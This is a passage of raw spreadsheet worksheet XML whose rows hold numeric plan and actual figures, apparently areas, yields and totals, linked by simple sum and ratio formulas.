        <f>O14/N14*100</f>
        <v>99.785015752622741</v>
      </c>
      <c r="AP14" s="74">
        <f>O14-M14</f>
        <v>-60.019999999997708</v>
      </c>
      <c r="AQ14" s="75"/>
    </row>
    <row r="15" spans="1:43" ht="22.5" customHeight="1">
      <c r="A15" s="76">
        <v>1</v>
      </c>
      <c r="B15" s="24" t="s">
        <v>57</v>
      </c>
      <c r="C15" s="25"/>
      <c r="D15" s="70"/>
      <c r="E15" s="71"/>
      <c r="F15" s="70"/>
      <c r="G15" s="70"/>
      <c r="H15" s="70"/>
      <c r="I15" s="70"/>
      <c r="J15" s="70"/>
      <c r="K15" s="70"/>
      <c r="L15" s="70"/>
      <c r="M15" s="77"/>
      <c r="N15" s="78"/>
      <c r="O15" s="73"/>
      <c r="P15" s="34"/>
      <c r="Q15" s="35"/>
      <c r="R15" s="79"/>
      <c r="S15" s="35"/>
      <c r="T15" s="34"/>
      <c r="U15" s="35"/>
      <c r="V15" s="79"/>
      <c r="W15" s="35"/>
      <c r="X15" s="34"/>
      <c r="Y15" s="35"/>
      <c r="Z15" s="79"/>
      <c r="AA15" s="35"/>
      <c r="AB15" s="34"/>
      <c r="AC15" s="35"/>
      <c r="AD15" s="79"/>
      <c r="AE15" s="35"/>
      <c r="AF15" s="34"/>
      <c r="AG15" s="79"/>
      <c r="AH15" s="35"/>
      <c r="AI15" s="34"/>
      <c r="AJ15" s="79"/>
      <c r="AK15" s="35"/>
      <c r="AL15" s="34"/>
      <c r="AM15" s="79"/>
      <c r="AN15" s="79"/>
      <c r="AO15" s="79"/>
      <c r="AP15" s="74"/>
      <c r="AQ15" s="80"/>
    </row>
    <row r="16" spans="1:43" ht="22.5" customHeight="1">
      <c r="A16" s="68" t="s">
        <v>3</v>
      </c>
      <c r="B16" s="81" t="s">
        <v>10</v>
      </c>
      <c r="C16" s="76" t="s">
        <v>1</v>
      </c>
      <c r="D16" s="82">
        <v>1536</v>
      </c>
      <c r="E16" s="83">
        <f>E20+E24</f>
        <v>1519</v>
      </c>
      <c r="F16" s="84">
        <f>F20+F24</f>
        <v>268.8</v>
      </c>
      <c r="G16" s="84">
        <f t="shared" ref="G16:L16" si="36">G20+G24</f>
        <v>266.5</v>
      </c>
      <c r="H16" s="84">
        <f t="shared" si="36"/>
        <v>258</v>
      </c>
      <c r="I16" s="84">
        <f t="shared" si="36"/>
        <v>296</v>
      </c>
      <c r="J16" s="84">
        <f t="shared" si="36"/>
        <v>240</v>
      </c>
      <c r="K16" s="84">
        <f t="shared" si="36"/>
        <v>65.92</v>
      </c>
      <c r="L16" s="84">
        <f t="shared" si="36"/>
        <v>116</v>
      </c>
      <c r="M16" s="85">
        <f>M20+M24</f>
        <v>1515.7</v>
      </c>
      <c r="N16" s="192">
        <f>N20+N24</f>
        <v>1511.22</v>
      </c>
      <c r="O16" s="86">
        <f>O20+O24</f>
        <v>1511.22</v>
      </c>
      <c r="P16" s="36">
        <f t="shared" ref="P16" si="37">P20+P24</f>
        <v>268.5</v>
      </c>
      <c r="Q16" s="37">
        <v>268.8</v>
      </c>
      <c r="R16" s="87">
        <f>R20+R24</f>
        <v>268.5</v>
      </c>
      <c r="S16" s="33"/>
      <c r="T16" s="11">
        <f t="shared" ref="T16" si="38">T20+T24</f>
        <v>266.8</v>
      </c>
      <c r="U16" s="12">
        <v>266.5</v>
      </c>
      <c r="V16" s="87">
        <f t="shared" ref="V16:X16" si="39">V20+V24</f>
        <v>266.8</v>
      </c>
      <c r="W16" s="12"/>
      <c r="X16" s="36">
        <f t="shared" si="39"/>
        <v>258</v>
      </c>
      <c r="Y16" s="37">
        <v>258</v>
      </c>
      <c r="Z16" s="87">
        <f t="shared" ref="Z16:AB16" si="40">Z20+Z24</f>
        <v>258</v>
      </c>
      <c r="AA16" s="12"/>
      <c r="AB16" s="11">
        <f t="shared" si="40"/>
        <v>296</v>
      </c>
      <c r="AC16" s="12"/>
      <c r="AD16" s="87">
        <f t="shared" ref="AD16:AF16" si="41">AD20+AD24</f>
        <v>296</v>
      </c>
      <c r="AE16" s="12"/>
      <c r="AF16" s="11">
        <f t="shared" si="41"/>
        <v>240</v>
      </c>
      <c r="AG16" s="87">
        <f t="shared" ref="AG16:AI16" si="42">AG20+AG24</f>
        <v>240</v>
      </c>
      <c r="AH16" s="12"/>
      <c r="AI16" s="11">
        <f t="shared" si="42"/>
        <v>65.92</v>
      </c>
      <c r="AJ16" s="87">
        <f t="shared" ref="AJ16:AL16" si="43">AJ20+AJ24</f>
        <v>65.92</v>
      </c>
      <c r="AK16" s="12"/>
      <c r="AL16" s="11">
        <f t="shared" si="43"/>
        <v>116</v>
      </c>
      <c r="AM16" s="87">
        <f t="shared" ref="AM16" si="44">AM20+AM24</f>
        <v>116</v>
      </c>
      <c r="AN16" s="87"/>
      <c r="AO16" s="73">
        <f>O16/N16*100</f>
        <v>100</v>
      </c>
      <c r="AP16" s="74">
        <f>O16-M16</f>
        <v>-4.4800000000000182</v>
      </c>
      <c r="AQ16" s="88"/>
    </row>
    <row r="17" spans="1:43" ht="22.5" customHeight="1">
      <c r="A17" s="68" t="s">
        <v>34</v>
      </c>
      <c r="B17" s="81" t="s">
        <v>11</v>
      </c>
      <c r="C17" s="25" t="s">
        <v>2</v>
      </c>
      <c r="D17" s="89">
        <v>52</v>
      </c>
      <c r="E17" s="83">
        <v>52.611586570111925</v>
      </c>
      <c r="F17" s="89">
        <f t="shared" ref="F17:L17" si="45">F18/F16*10</f>
        <v>54.932291666666664</v>
      </c>
      <c r="G17" s="89">
        <f t="shared" si="45"/>
        <v>60.106191369606002</v>
      </c>
      <c r="H17" s="89">
        <f t="shared" si="45"/>
        <v>41.058139534883722</v>
      </c>
      <c r="I17" s="89">
        <f t="shared" si="45"/>
        <v>44.820945945945951</v>
      </c>
      <c r="J17" s="89">
        <f t="shared" si="45"/>
        <v>65.641666666666666</v>
      </c>
      <c r="K17" s="89">
        <f t="shared" si="45"/>
        <v>57.021844660194176</v>
      </c>
      <c r="L17" s="89">
        <f t="shared" si="45"/>
        <v>47.568965517241381</v>
      </c>
      <c r="M17" s="90">
        <f>M18/M16*10</f>
        <v>22.136174704756876</v>
      </c>
      <c r="N17" s="193">
        <f>N18/N16*10</f>
        <v>27.742684718307061</v>
      </c>
      <c r="O17" s="86">
        <f>O18/O16*10</f>
        <v>22.568589616336467</v>
      </c>
      <c r="P17" s="11">
        <f t="shared" ref="P17" si="46">P18/P16*10</f>
        <v>55.791433891992554</v>
      </c>
      <c r="Q17" s="12">
        <v>54.932291666666664</v>
      </c>
      <c r="R17" s="87">
        <f>R18/R16*10</f>
        <v>26.293109869646184</v>
      </c>
      <c r="S17" s="12"/>
      <c r="T17" s="11">
        <f t="shared" ref="T17" si="47">T18/T16*10</f>
        <v>25.907046476761622</v>
      </c>
      <c r="U17" s="12">
        <v>60.106191369606002</v>
      </c>
      <c r="V17" s="87">
        <f t="shared" ref="V17:X17" si="48">V18/V16*10</f>
        <v>26.028485757121437</v>
      </c>
      <c r="W17" s="12"/>
      <c r="X17" s="11">
        <f t="shared" si="48"/>
        <v>15.13953488372093</v>
      </c>
      <c r="Y17" s="12">
        <v>41.058139534883722</v>
      </c>
      <c r="Z17" s="87">
        <f t="shared" ref="Z17:AB17" si="49">Z18/Z16*10</f>
        <v>15.212790697674416</v>
      </c>
      <c r="AA17" s="12"/>
      <c r="AB17" s="11">
        <f t="shared" si="49"/>
        <v>17.66554054054054</v>
      </c>
      <c r="AC17" s="12"/>
      <c r="AD17" s="87">
        <f t="shared" ref="AD17:AF17" si="50">AD18/AD16*10</f>
        <v>17.66554054054054</v>
      </c>
      <c r="AE17" s="12"/>
      <c r="AF17" s="11">
        <f t="shared" si="50"/>
        <v>28.991666666666664</v>
      </c>
      <c r="AG17" s="87">
        <f t="shared" ref="AG17:AI17" si="51">AG18/AG16*10</f>
        <v>29.114166666666669</v>
      </c>
      <c r="AH17" s="12"/>
      <c r="AI17" s="11">
        <f t="shared" si="51"/>
        <v>23.684769417475728</v>
      </c>
      <c r="AJ17" s="87">
        <f t="shared" ref="AJ17:AL17" si="52">AJ18/AJ16*10</f>
        <v>23.757645631067959</v>
      </c>
      <c r="AK17" s="12"/>
      <c r="AL17" s="11">
        <f t="shared" si="52"/>
        <v>20.508620689655174</v>
      </c>
      <c r="AM17" s="87">
        <f t="shared" ref="AM17" si="53">AM18/AM16*10</f>
        <v>20.643103448275859</v>
      </c>
      <c r="AN17" s="87"/>
      <c r="AO17" s="73">
        <f>O17/N17*100</f>
        <v>81.349695768426216</v>
      </c>
      <c r="AP17" s="74"/>
      <c r="AQ17" s="91"/>
    </row>
    <row r="18" spans="1:43" ht="22.5" customHeight="1">
      <c r="A18" s="68" t="s">
        <v>34</v>
      </c>
      <c r="B18" s="81" t="s">
        <v>12</v>
      </c>
      <c r="C18" s="25" t="s">
        <v>36</v>
      </c>
      <c r="D18" s="89">
        <v>8012</v>
      </c>
      <c r="E18" s="83">
        <v>7991.7000000000007</v>
      </c>
      <c r="F18" s="89">
        <f t="shared" ref="F18:L18" si="54">F22+F26</f>
        <v>1476.58</v>
      </c>
      <c r="G18" s="89">
        <f t="shared" si="54"/>
        <v>1601.83</v>
      </c>
      <c r="H18" s="89">
        <f t="shared" si="54"/>
        <v>1059.3</v>
      </c>
      <c r="I18" s="89">
        <f t="shared" si="54"/>
        <v>1326.7</v>
      </c>
      <c r="J18" s="89">
        <f t="shared" si="54"/>
        <v>1575.4</v>
      </c>
      <c r="K18" s="89">
        <f t="shared" si="54"/>
        <v>375.88800000000003</v>
      </c>
      <c r="L18" s="89">
        <f t="shared" si="54"/>
        <v>551.79999999999995</v>
      </c>
      <c r="M18" s="90">
        <f>M22</f>
        <v>3355.18</v>
      </c>
      <c r="N18" s="192">
        <f>N22+N26</f>
        <v>4192.53</v>
      </c>
      <c r="O18" s="86">
        <f>R18+V18+Z18+AD18+AG18+AJ18+AM18</f>
        <v>3410.6104</v>
      </c>
      <c r="P18" s="11">
        <f t="shared" ref="P18" si="55">P22+P26</f>
        <v>1498</v>
      </c>
      <c r="Q18" s="12">
        <v>1476.58</v>
      </c>
      <c r="R18" s="87">
        <f>R22+R26</f>
        <v>705.97</v>
      </c>
      <c r="S18" s="12"/>
      <c r="T18" s="11">
        <f t="shared" ref="T18" si="56">T22+T26</f>
        <v>691.2</v>
      </c>
      <c r="U18" s="12">
        <v>1601.83</v>
      </c>
      <c r="V18" s="87">
        <f t="shared" ref="V18:X18" si="57">V22+V26</f>
        <v>694.43999999999994</v>
      </c>
      <c r="W18" s="12"/>
      <c r="X18" s="11">
        <f t="shared" si="57"/>
        <v>390.6</v>
      </c>
      <c r="Y18" s="12">
        <v>1059.3</v>
      </c>
      <c r="Z18" s="87">
        <f t="shared" ref="Z18:AB18" si="58">Z22+Z26</f>
        <v>392.48999999999995</v>
      </c>
      <c r="AA18" s="12"/>
      <c r="AB18" s="11">
        <f t="shared" si="58"/>
        <v>522.9</v>
      </c>
      <c r="AC18" s="12"/>
      <c r="AD18" s="87">
        <f t="shared" ref="AD18:AF18" si="59">AD22+AD26</f>
        <v>522.9</v>
      </c>
      <c r="AE18" s="12"/>
      <c r="AF18" s="11">
        <f t="shared" si="59"/>
        <v>695.8</v>
      </c>
      <c r="AG18" s="87">
        <f t="shared" ref="AG18:AI18" si="60">AG22+AG26</f>
        <v>698.74</v>
      </c>
      <c r="AH18" s="12"/>
      <c r="AI18" s="11">
        <f t="shared" si="60"/>
        <v>156.13</v>
      </c>
      <c r="AJ18" s="87">
        <f t="shared" ref="AJ18:AL18" si="61">AJ22+AJ26</f>
        <v>156.6104</v>
      </c>
      <c r="AK18" s="12"/>
      <c r="AL18" s="11">
        <f t="shared" si="61"/>
        <v>237.9</v>
      </c>
      <c r="AM18" s="87">
        <f t="shared" ref="AM18" si="62">AM22+AM26</f>
        <v>239.45999999999998</v>
      </c>
      <c r="AN18" s="87"/>
      <c r="AO18" s="73">
        <f>O18/N18*100</f>
        <v>81.34969576842623</v>
      </c>
      <c r="AP18" s="74"/>
      <c r="AQ18" s="91"/>
    </row>
    <row r="19" spans="1:43" s="189" customFormat="1" ht="22.5" customHeight="1">
      <c r="A19" s="92" t="s">
        <v>6</v>
      </c>
      <c r="B19" s="93" t="s">
        <v>13</v>
      </c>
      <c r="C19" s="93" t="s">
        <v>39</v>
      </c>
      <c r="D19" s="70"/>
      <c r="E19" s="71"/>
      <c r="F19" s="82"/>
      <c r="G19" s="82"/>
      <c r="H19" s="82"/>
      <c r="I19" s="82"/>
      <c r="J19" s="82"/>
      <c r="K19" s="82"/>
      <c r="L19" s="82"/>
      <c r="M19" s="94"/>
      <c r="N19" s="194"/>
      <c r="O19" s="73"/>
      <c r="P19" s="36"/>
      <c r="Q19" s="37"/>
      <c r="R19" s="95"/>
      <c r="S19" s="37"/>
      <c r="T19" s="36"/>
      <c r="U19" s="37"/>
      <c r="V19" s="95"/>
      <c r="W19" s="37"/>
      <c r="X19" s="36"/>
      <c r="Y19" s="37"/>
      <c r="Z19" s="95"/>
      <c r="AA19" s="37"/>
      <c r="AB19" s="36"/>
      <c r="AC19" s="37"/>
      <c r="AD19" s="95"/>
      <c r="AE19" s="37"/>
      <c r="AF19" s="36"/>
      <c r="AG19" s="95"/>
      <c r="AH19" s="37"/>
      <c r="AI19" s="36"/>
      <c r="AJ19" s="95"/>
      <c r="AK19" s="37"/>
      <c r="AL19" s="36"/>
      <c r="AM19" s="95"/>
      <c r="AN19" s="95"/>
      <c r="AO19" s="73"/>
      <c r="AP19" s="74"/>
      <c r="AQ19" s="96"/>
    </row>
    <row r="20" spans="1:43" ht="22.5" customHeight="1">
      <c r="A20" s="68" t="s">
        <v>34</v>
      </c>
      <c r="B20" s="81" t="s">
        <v>10</v>
      </c>
      <c r="C20" s="25" t="s">
        <v>1</v>
      </c>
      <c r="D20" s="82">
        <v>523</v>
      </c>
      <c r="E20" s="97">
        <v>528</v>
      </c>
      <c r="F20" s="82">
        <v>113.8</v>
      </c>
      <c r="G20" s="82">
        <v>107.7</v>
      </c>
      <c r="H20" s="82">
        <v>63</v>
      </c>
      <c r="I20" s="82">
        <v>83</v>
      </c>
      <c r="J20" s="82">
        <v>98</v>
      </c>
      <c r="K20" s="82">
        <v>24.02</v>
      </c>
      <c r="L20" s="82">
        <v>39</v>
      </c>
      <c r="M20" s="94">
        <v>528.5</v>
      </c>
      <c r="N20" s="98">
        <f>P20+T20+X20+AB20+AF20+AI20+AL20</f>
        <v>528.52</v>
      </c>
      <c r="O20" s="86">
        <f>R20+V20+Z20+AD20+AG20+AJ20+AM20</f>
        <v>528.52</v>
      </c>
      <c r="P20" s="36">
        <v>113.5</v>
      </c>
      <c r="Q20" s="37">
        <v>113.8</v>
      </c>
      <c r="R20" s="95">
        <f>113.5</f>
        <v>113.5</v>
      </c>
      <c r="S20" s="33"/>
      <c r="T20" s="36">
        <v>108</v>
      </c>
      <c r="U20" s="37">
        <v>107.7</v>
      </c>
      <c r="V20" s="95">
        <v>108</v>
      </c>
      <c r="W20" s="37"/>
      <c r="X20" s="36">
        <v>63</v>
      </c>
      <c r="Y20" s="37">
        <v>63</v>
      </c>
      <c r="Z20" s="95">
        <f>63</f>
        <v>63</v>
      </c>
      <c r="AA20" s="37"/>
      <c r="AB20" s="36">
        <v>83</v>
      </c>
      <c r="AC20" s="37"/>
      <c r="AD20" s="95">
        <f>83</f>
        <v>83</v>
      </c>
      <c r="AE20" s="37"/>
      <c r="AF20" s="36">
        <v>98</v>
      </c>
      <c r="AG20" s="95">
        <v>98</v>
      </c>
      <c r="AH20" s="37"/>
      <c r="AI20" s="36">
        <v>24.02</v>
      </c>
      <c r="AJ20" s="95">
        <f>24.02</f>
        <v>24.02</v>
      </c>
      <c r="AK20" s="37"/>
      <c r="AL20" s="36">
        <v>39</v>
      </c>
      <c r="AM20" s="95">
        <f>39</f>
        <v>39</v>
      </c>
      <c r="AN20" s="95"/>
      <c r="AO20" s="73">
        <f>O20/N20*100</f>
        <v>100</v>
      </c>
      <c r="AP20" s="74">
        <f>O20-M20</f>
        <v>1.999999999998181E-2</v>
      </c>
      <c r="AQ20" s="96"/>
    </row>
    <row r="21" spans="1:43" ht="22.5" customHeight="1">
      <c r="A21" s="68" t="s">
        <v>34</v>
      </c>
      <c r="B21" s="81" t="s">
        <v>11</v>
      </c>
      <c r="C21" s="25" t="s">
        <v>2</v>
      </c>
      <c r="D21" s="83">
        <v>63</v>
      </c>
      <c r="E21" s="83">
        <f>E22/E20*10</f>
        <v>63.482954545454547</v>
      </c>
      <c r="F21" s="89">
        <v>61</v>
      </c>
      <c r="G21" s="89">
        <v>63</v>
      </c>
      <c r="H21" s="89">
        <v>61</v>
      </c>
      <c r="I21" s="89">
        <v>62</v>
      </c>
      <c r="J21" s="89">
        <v>71</v>
      </c>
      <c r="K21" s="89">
        <v>64</v>
      </c>
      <c r="L21" s="89">
        <v>60</v>
      </c>
      <c r="M21" s="90">
        <f>M22/M20*10</f>
        <v>63.48495742667928</v>
      </c>
      <c r="N21" s="193">
        <f>N22/N20*10</f>
        <v>64.297093771285859</v>
      </c>
      <c r="O21" s="86">
        <f>O22/O20*10</f>
        <v>64.531340346628326</v>
      </c>
      <c r="P21" s="11">
        <v>62</v>
      </c>
      <c r="Q21" s="12">
        <v>61</v>
      </c>
      <c r="R21" s="87">
        <v>62.2</v>
      </c>
      <c r="S21" s="12"/>
      <c r="T21" s="11">
        <v>64</v>
      </c>
      <c r="U21" s="12">
        <v>63</v>
      </c>
      <c r="V21" s="87">
        <v>64.3</v>
      </c>
      <c r="W21" s="12"/>
      <c r="X21" s="11">
        <v>62</v>
      </c>
      <c r="Y21" s="12">
        <v>61</v>
      </c>
      <c r="Z21" s="87">
        <v>62.3</v>
      </c>
      <c r="AA21" s="12"/>
      <c r="AB21" s="11">
        <v>63</v>
      </c>
      <c r="AC21" s="12"/>
      <c r="AD21" s="87">
        <v>63</v>
      </c>
      <c r="AE21" s="12"/>
      <c r="AF21" s="11">
        <v>71</v>
      </c>
      <c r="AG21" s="87">
        <v>71.3</v>
      </c>
      <c r="AH21" s="12"/>
      <c r="AI21" s="11">
        <v>65</v>
      </c>
      <c r="AJ21" s="87">
        <v>65.2</v>
      </c>
      <c r="AK21" s="12"/>
      <c r="AL21" s="11">
        <v>61</v>
      </c>
      <c r="AM21" s="87">
        <v>61.4</v>
      </c>
      <c r="AN21" s="87"/>
      <c r="AO21" s="73"/>
      <c r="AP21" s="74"/>
      <c r="AQ21" s="91"/>
    </row>
    <row r="22" spans="1:43" ht="22.5" customHeight="1">
      <c r="A22" s="68" t="s">
        <v>34</v>
      </c>
      <c r="B22" s="81" t="s">
        <v>12</v>
      </c>
      <c r="C22" s="25" t="s">
        <v>36</v>
      </c>
      <c r="D22" s="89">
        <v>3313</v>
      </c>
      <c r="E22" s="83">
        <v>3351.9</v>
      </c>
      <c r="F22" s="89">
        <f t="shared" ref="F22:G22" si="63">F21*F20/10</f>
        <v>694.18000000000006</v>
      </c>
      <c r="G22" s="89">
        <f t="shared" si="63"/>
        <v>678.51</v>
      </c>
      <c r="H22" s="89">
        <f>H21*H20/10</f>
        <v>384.3</v>
      </c>
      <c r="I22" s="89">
        <f t="shared" ref="I22:L22" si="64">I21*I20/10</f>
        <v>514.6</v>
      </c>
      <c r="J22" s="89">
        <f t="shared" si="64"/>
        <v>695.8</v>
      </c>
      <c r="K22" s="89">
        <f t="shared" si="64"/>
        <v>153.72800000000001</v>
      </c>
      <c r="L22" s="89">
        <f t="shared" si="64"/>
        <v>234</v>
      </c>
      <c r="M22" s="90">
        <v>3355.18</v>
      </c>
      <c r="N22" s="193">
        <f>P22+T22+X22+AB22+AF22+AI22+AL22</f>
        <v>3398.23</v>
      </c>
      <c r="O22" s="86">
        <f>R22+V22+Z22+AD22+AG22+AJ22+AM22</f>
        <v>3410.6104</v>
      </c>
      <c r="P22" s="11">
        <f t="shared" ref="P22" si="65">P21*P20/10</f>
        <v>703.7</v>
      </c>
      <c r="Q22" s="12">
        <v>694.18000000000006</v>
      </c>
      <c r="R22" s="87">
        <f t="shared" ref="R22:T22" si="66">R21*R20/10</f>
        <v>705.97</v>
      </c>
      <c r="S22" s="12"/>
      <c r="T22" s="11">
        <f t="shared" si="66"/>
        <v>691.2</v>
      </c>
      <c r="U22" s="12">
        <v>678.51</v>
      </c>
      <c r="V22" s="87">
        <f t="shared" ref="V22:X22" si="67">V21*V20/10</f>
        <v>694.43999999999994</v>
      </c>
      <c r="W22" s="12"/>
      <c r="X22" s="11">
        <f t="shared" si="67"/>
        <v>390.6</v>
      </c>
      <c r="Y22" s="12">
        <v>384.3</v>
      </c>
      <c r="Z22" s="87">
        <f>Z21*Z20/10</f>
        <v>392.48999999999995</v>
      </c>
      <c r="AA22" s="12"/>
      <c r="AB22" s="11">
        <f t="shared" ref="AB22" si="68">AB21*AB20/10</f>
        <v>522.9</v>
      </c>
      <c r="AC22" s="12"/>
      <c r="AD22" s="87">
        <f t="shared" ref="AD22:AF22" si="69">AD21*AD20/10</f>
        <v>522.9</v>
      </c>
      <c r="AE22" s="12"/>
      <c r="AF22" s="11">
        <f t="shared" si="69"/>
        <v>695.8</v>
      </c>
      <c r="AG22" s="87">
        <f t="shared" ref="AG22:AI22" si="70">AG21*AG20/10</f>
        <v>698.74</v>
      </c>
      <c r="AH22" s="12"/>
      <c r="AI22" s="11">
        <f t="shared" si="70"/>
        <v>156.13</v>
      </c>
      <c r="AJ22" s="87">
        <f t="shared" ref="AJ22:AL22" si="71">AJ21*AJ20/10</f>
        <v>156.6104</v>
      </c>
      <c r="AK22" s="12"/>
      <c r="AL22" s="11">
        <f t="shared" si="71"/>
        <v>237.9</v>
      </c>
      <c r="AM22" s="87">
        <f t="shared" ref="AM22" si="72">AM21*AM20/10</f>
        <v>239.45999999999998</v>
      </c>
      <c r="AN22" s="87"/>
      <c r="AO22" s="73">
        <f>O22/N22*100</f>
        <v>100.36431907198748</v>
      </c>
      <c r="AP22" s="74"/>
      <c r="AQ22" s="91"/>
    </row>
    <row r="23" spans="1:43" ht="22.5" customHeight="1">
      <c r="A23" s="92" t="s">
        <v>7</v>
      </c>
      <c r="B23" s="93" t="s">
        <v>42</v>
      </c>
      <c r="C23" s="25" t="s">
        <v>39</v>
      </c>
      <c r="D23" s="82"/>
      <c r="E23" s="71"/>
      <c r="F23" s="82"/>
      <c r="G23" s="84"/>
      <c r="H23" s="82"/>
      <c r="I23" s="84"/>
      <c r="J23" s="82"/>
      <c r="K23" s="84"/>
      <c r="L23" s="82"/>
      <c r="M23" s="94"/>
      <c r="N23" s="194"/>
      <c r="O23" s="73"/>
      <c r="P23" s="36"/>
      <c r="Q23" s="37"/>
      <c r="R23" s="95"/>
      <c r="S23" s="37"/>
      <c r="T23" s="11"/>
      <c r="U23" s="12"/>
      <c r="V23" s="87"/>
      <c r="W23" s="12"/>
      <c r="X23" s="36"/>
      <c r="Y23" s="37"/>
      <c r="Z23" s="95"/>
      <c r="AA23" s="37"/>
      <c r="AB23" s="11"/>
      <c r="AC23" s="12"/>
      <c r="AD23" s="87"/>
      <c r="AE23" s="12"/>
      <c r="AF23" s="11"/>
      <c r="AG23" s="95"/>
      <c r="AH23" s="37"/>
      <c r="AI23" s="11"/>
      <c r="AJ23" s="87"/>
      <c r="AK23" s="12"/>
      <c r="AL23" s="11"/>
      <c r="AM23" s="95"/>
      <c r="AN23" s="95"/>
      <c r="AO23" s="73"/>
      <c r="AP23" s="74"/>
      <c r="AQ23" s="96"/>
    </row>
    <row r="24" spans="1:43" ht="22.5" customHeight="1">
      <c r="A24" s="68" t="s">
        <v>34</v>
      </c>
      <c r="B24" s="81" t="s">
        <v>10</v>
      </c>
      <c r="C24" s="68" t="s">
        <v>1</v>
      </c>
      <c r="D24" s="82">
        <v>1013</v>
      </c>
      <c r="E24" s="83">
        <f>E28+E32</f>
        <v>991</v>
      </c>
      <c r="F24" s="83">
        <f t="shared" ref="F24:L24" si="73">F28+F32</f>
        <v>155</v>
      </c>
      <c r="G24" s="83">
        <f t="shared" si="73"/>
        <v>158.80000000000001</v>
      </c>
      <c r="H24" s="83">
        <f t="shared" si="73"/>
        <v>195</v>
      </c>
      <c r="I24" s="83">
        <f t="shared" si="73"/>
        <v>213</v>
      </c>
      <c r="J24" s="83">
        <f t="shared" si="73"/>
        <v>142</v>
      </c>
      <c r="K24" s="83">
        <f t="shared" si="73"/>
        <v>41.9</v>
      </c>
      <c r="L24" s="83">
        <f t="shared" si="73"/>
        <v>77</v>
      </c>
      <c r="M24" s="99">
        <f>M32+M28</f>
        <v>987.2</v>
      </c>
      <c r="N24" s="98">
        <f>N28+N32</f>
        <v>982.7</v>
      </c>
      <c r="O24" s="86">
        <f>O28+O32</f>
        <v>982.7</v>
      </c>
      <c r="P24" s="36">
        <f t="shared" ref="P24" si="74">P28+P32</f>
        <v>155</v>
      </c>
      <c r="Q24" s="37">
        <v>155</v>
      </c>
      <c r="R24" s="86">
        <f>R28+R32</f>
        <v>155</v>
      </c>
      <c r="S24" s="33">
        <f>R24-Q24</f>
        <v>0</v>
      </c>
      <c r="T24" s="11">
        <f t="shared" ref="T24" si="75">T28+T32</f>
        <v>158.80000000000001</v>
      </c>
      <c r="U24" s="12">
        <v>158.80000000000001</v>
      </c>
      <c r="V24" s="86">
        <f t="shared" ref="V24:X24" si="76">V28+V32</f>
        <v>158.80000000000001</v>
      </c>
      <c r="W24" s="41"/>
      <c r="X24" s="36">
        <f t="shared" si="76"/>
        <v>195</v>
      </c>
      <c r="Y24" s="37">
        <v>195</v>
      </c>
      <c r="Z24" s="86">
        <f t="shared" ref="Z24:AB24" si="77">Z28+Z32</f>
        <v>195</v>
      </c>
      <c r="AA24" s="41"/>
      <c r="AB24" s="11">
        <f t="shared" si="77"/>
        <v>213</v>
      </c>
      <c r="AC24" s="12"/>
      <c r="AD24" s="86">
        <f t="shared" ref="AD24:AF24" si="78">AD28+AD32</f>
        <v>213</v>
      </c>
      <c r="AE24" s="41"/>
      <c r="AF24" s="11">
        <f t="shared" si="78"/>
        <v>142</v>
      </c>
      <c r="AG24" s="86">
        <f t="shared" ref="AG24:AI24" si="79">AG28+AG32</f>
        <v>142</v>
      </c>
      <c r="AH24" s="41"/>
      <c r="AI24" s="11">
        <f t="shared" si="79"/>
        <v>41.9</v>
      </c>
      <c r="AJ24" s="86">
        <f t="shared" ref="AJ24:AL24" si="80">AJ28+AJ32</f>
        <v>41.9</v>
      </c>
      <c r="AK24" s="41"/>
      <c r="AL24" s="11">
        <f t="shared" si="80"/>
        <v>77</v>
      </c>
      <c r="AM24" s="86">
        <f t="shared" ref="AM24" si="81">AM28+AM32</f>
        <v>77</v>
      </c>
      <c r="AN24" s="86"/>
      <c r="AO24" s="73">
        <f>O24/N24*100</f>
        <v>100</v>
      </c>
      <c r="AP24" s="74">
        <f>O24-M24</f>
        <v>-4.5</v>
      </c>
      <c r="AQ24" s="100"/>
    </row>
    <row r="25" spans="1:43" ht="22.5" customHeight="1">
      <c r="A25" s="68" t="s">
        <v>34</v>
      </c>
      <c r="B25" s="81" t="s">
        <v>11</v>
      </c>
      <c r="C25" s="25" t="s">
        <v>2</v>
      </c>
      <c r="D25" s="89">
        <v>46</v>
      </c>
      <c r="E25" s="83">
        <f>E26/E24*10</f>
        <v>46.819374369323924</v>
      </c>
      <c r="F25" s="89">
        <f>F26/F24*10</f>
        <v>50.477419354838709</v>
      </c>
      <c r="G25" s="89">
        <f t="shared" ref="G25:L25" si="82">G26/G24*10</f>
        <v>58.143576826196465</v>
      </c>
      <c r="H25" s="89">
        <f t="shared" si="82"/>
        <v>34.615384615384613</v>
      </c>
      <c r="I25" s="89">
        <f t="shared" si="82"/>
        <v>38.12676056338028</v>
      </c>
      <c r="J25" s="89">
        <f t="shared" si="82"/>
        <v>61.943661971830991</v>
      </c>
      <c r="K25" s="89">
        <f t="shared" si="82"/>
        <v>53.021479713603824</v>
      </c>
      <c r="L25" s="89">
        <f t="shared" si="82"/>
        <v>41.272727272727266</v>
      </c>
      <c r="M25" s="85"/>
      <c r="N25" s="98">
        <f>N26/N24*10</f>
        <v>8.0828330110918891</v>
      </c>
      <c r="O25" s="87">
        <f>O26/O24*10</f>
        <v>0</v>
      </c>
      <c r="P25" s="11">
        <f t="shared" ref="P25:R25" si="83">P26/P24*10</f>
        <v>51.245161290322578</v>
      </c>
      <c r="Q25" s="11">
        <v>50.477419354838709</v>
      </c>
      <c r="R25" s="11">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="S25" s="11"/>
      <c r="T25" s="11">
        <f t="shared" ref="T25:V25" si="84">T26/T24*10</f>
        <v>0</v>
      </c>
      <c r="U25" s="11">
        <v>58.143576826196465</v>
      </c>
      <c r="V25" s="11">
        <f t="shared" si="84"/>
        <v>0</v>
      </c>
      <c r="W25" s="11"/>
      <c r="X25" s="11">
        <f t="shared" ref="X25:Z25" si="85">X26/X24*10</f>
        <v>0</v>
      </c>
      <c r="Y25" s="11">
        <v>34.615384615384613</v>
      </c>
      <c r="Z25" s="11">
        <f t="shared" si="85"/>
        <v>0</v>
      </c>
      <c r="AA25" s="11"/>
      <c r="AB25" s="11">
        <f t="shared" ref="AB25:AD25" si="86">AB26/AB24*10</f>
        <v>0</v>
      </c>
      <c r="AC25" s="11"/>
      <c r="AD25" s="11">
        <f t="shared" si="86"/>
        <v>0</v>
      </c>
      <c r="AE25" s="11"/>
      <c r="AF25" s="11">
        <f t="shared" ref="AF25:AG25" si="87">AF26/AF24*10</f>
        <v>0</v>
      </c>
      <c r="AG25" s="11">
        <f t="shared" si="87"/>
        <v>0</v>
      </c>
      <c r="AH25" s="11"/>
      <c r="AI25" s="11">
